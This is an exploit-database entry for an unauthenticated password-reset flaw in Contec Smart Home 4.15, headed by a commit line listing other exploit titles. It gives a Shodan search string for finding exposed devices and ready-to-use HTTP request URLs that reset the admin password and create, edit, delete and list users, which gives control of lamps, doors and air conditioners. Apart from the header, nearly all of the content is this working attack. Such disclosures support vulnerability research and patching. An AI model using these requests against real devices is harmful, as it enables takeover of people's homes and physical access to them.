b0fc7bfd43
6 changes to exploits/shellcodes Android DRM Services - Buffer Overflow MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution Contec Smart Home 4.15 - Unauthorized Password Reset
30 lines
No EOL
1.1 KiB
Text
30 lines
No EOL
1.1 KiB
Text
# Title : Contec smart home 4.15 Unauthorized Password Reset
|
|
# Shodan Dork : "content/smarthome.php"
|
|
# Vendor Homepage : http://contec.co.il
|
|
# Tested on : Google Chrome
|
|
# Tested version : 4.15
|
|
# Date : 2018-03-14
|
|
# Author : Z3ro0ne
|
|
# Contact : saadousfar59@gmail.com
|
|
# Facebook Page : https://www.facebook.com/Z3ro0ne
|
|
|
|
# Vulnerability description :
|
|
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)
|
|
|
|
|
|
# Exploit
|
|
|
|
To Reset Admin password
|
|
http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
|
|
|
|
To Create a new user
|
|
http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
|
|
|
|
To edit a user
|
|
http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
|
|
|
|
To Delete a user
|
|
http://Ipaddress:port/content/delete_user.php?user_name=USER
|
|
|
|
Users list
|
|
http://Ipaddress:port/content/user.php |